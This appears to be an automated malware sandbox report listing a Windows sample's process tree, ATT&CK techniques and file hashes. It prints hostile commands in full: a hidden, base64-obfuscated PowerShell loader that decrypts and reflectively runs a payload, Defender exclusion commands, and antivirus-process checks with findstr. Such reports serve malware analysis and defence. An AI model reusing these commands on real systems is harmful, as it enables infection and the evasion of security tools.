C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Command and Scripting Interpreter: PowerShell
PID:12768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\6⤵PID:8412
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:3752
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415840101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10415840101\qWR3lUj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1940 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:3444
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415850101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10415850101\TbV75ZR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2448 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:6108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 5125⤵
- Program crash
PID:8316
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10415861121\5ym0ZYg.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:11616 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10415861121\5ym0ZYg.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:11708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
PID:12012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415870101\23aa9fd1d3.exe"C:\Users\Admin\AppData\Local\Temp\10415870101\23aa9fd1d3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7996
-
-
C:\Users\Admin\AppData\Local\Temp\10415880101\PQPYAYJJ.exe"C:\Users\Admin\AppData\Local\Temp\10415880101\PQPYAYJJ.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6184 -
C:\Users\Admin\Abspawnhlp.exe"C:\Users\Admin\Abspawnhlp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:8976 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:9152 -
C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exeC:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe6⤵
- Loads dropped DLL
PID:5000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
PID:12540
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415890101\captcha.exe"C:\Users\Admin\AppData\Local\Temp\10415890101\captcha.exe"3⤵
- Executes dropped EXE
PID:11164
-
-
C:\Users\Admin\AppData\Local\Temp\10415900101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10415900101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:13224 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:6664 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:6560
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6956
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:6972
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183775⤵PID:7600
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab5⤵PID:7576
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation5⤵
- System Location Discovery: System Language Discovery
PID:7824
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com5⤵
- System Location Discovery: System Language Discovery
PID:7848
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N5⤵
- System Location Discovery: System Language Discovery
PID:7876
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7892
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:7912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415910101\XOPPRUc.exe"C:\Users\Admin\AppData\Local\Temp\10415910101\XOPPRUc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:9232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:1604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2984
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6192
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415920101\h8NlU62.exe"C:\Users\Admin\AppData\Local\Temp\10415920101\h8NlU62.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7176 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415930101\HAe88WC.exe"C:\Users\Admin\AppData\Local\Temp\10415930101\HAe88WC.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6952 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:8040
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:8044
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:8056
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415940101\f1dd621e77.exe"C:\Users\Admin\AppData\Local\Temp\10415940101\f1dd621e77.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:11144
-
-
C:\Users\Admin\AppData\Local\Temp\10415950101\1e1e842738.exe"C:\Users\Admin\AppData\Local\Temp\10415950101\1e1e842738.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9580
-
-
C:\Users\Admin\AppData\Local\Temp\10415960101\e7b605131d.exe"C:\Users\Admin\AppData\Local\Temp\10415960101\e7b605131d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\10415970101\08c15e8fbc.exe"C:\Users\Admin\AppData\Local\Temp\10415970101\08c15e8fbc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:8868 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10415970101\08c15e8fbc.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9560
-
-
-
C:\Users\Admin\AppData\Local\Temp\10415980101\49b1c089fd.exe"C:\Users\Admin\AppData\Local\Temp\10415980101\49b1c089fd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:11548 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10415980101\49b1c089fd.exe"4⤵
- Executes dropped EXE
PID:8132
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5004
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4740
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"C:\Users\Admin\AppData\Local\Temp\Spacebar\CamMenuMaker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3200 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4128 -
C:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exeC:\Users\Admin\AppData\Roaming\jbn_Stream_beta_v2\CamMenuMaker.exe4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:12920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe4⤵
- System Location Discovery: System Language Discovery
PID:6224
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4220
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:32
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:7336
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:8188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6108 -ip 61081⤵PID:8244
-
C:\ProgramData\Redstage\Updater.exeC:\ProgramData\Redstage\Updater.exe /u1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:8312
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8400
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Ignore Process Interrupts
1Impair Defenses
2Disable or Modify System Firewall
1Modify Authentication Process
1Modify Registry
3Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Process Discovery
1Query Registry
9System Information Discovery
6System Location Discovery
1System Language Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD5178f5ab6560dc620947ffa83d86ba027
SHA124ab71184f00422122a1ee1cdecfc01b08c581b4
SHA256f54b2cbf13c26d712720ed878d46efb8a28ab17b34d1aee72ea55ba27fa1861c
SHA51284916a3745fecccf41e2d26d873107ecc6f2ed839bf49b3013a332620d243332b2078373d9607df19c3437c9fa406c596b5312f3c7239927f7fb6c7b2930599e
-
Filesize
27KB
MD55b8fb06983be9063ef128fa5aee80b3a
SHA1c065a0ee84eb1fd646ea213bca20543306d7c9e1
SHA256ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e
SHA512868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize1KB
MD599d2d513adeb4532b2898717af428b0a
SHA1a715ed08c0ca03ee1347d22592c34a1982277182
SHA256517fe0d8c0a7f932a839c12292113407f111d5224e5f54a06f2d03f56a375138
SHA51250bd5f783b7d690c0573c66f403b1da2dd961625a41bfa7ca2316a214a5137218e3258d60f612f455a55cca834ed641f876b1d9f7609810484c95160a3bbaf7c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize488B
MD59ca605db1e2bb4bd31c862093d9964b2
SHA13113c86287fab7cc1f232c6c0bf446044bbe6033
SHA25612da35812d0d15bd658954073e9248485539c5abad576f3e2c4a4ca419d9adac
SHA512c90be44db3fc34ac75efa8742c79c3a1086acc03ebab91d1a72b899a3205d05697df7f8ed7cca7c19350e3692019888b90d28bcb014ca5ab46dfb92ecec83256
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize482B
MD5540cee99636af7c7f5feb35d01bf13f6
SHA15f41a5db5db69c60e5a394fb62ec1bece6240950
SHA25652ff646a79e0692e696b2e5045c193c716147a0db3d9bd30cccb095fdd4e30b3
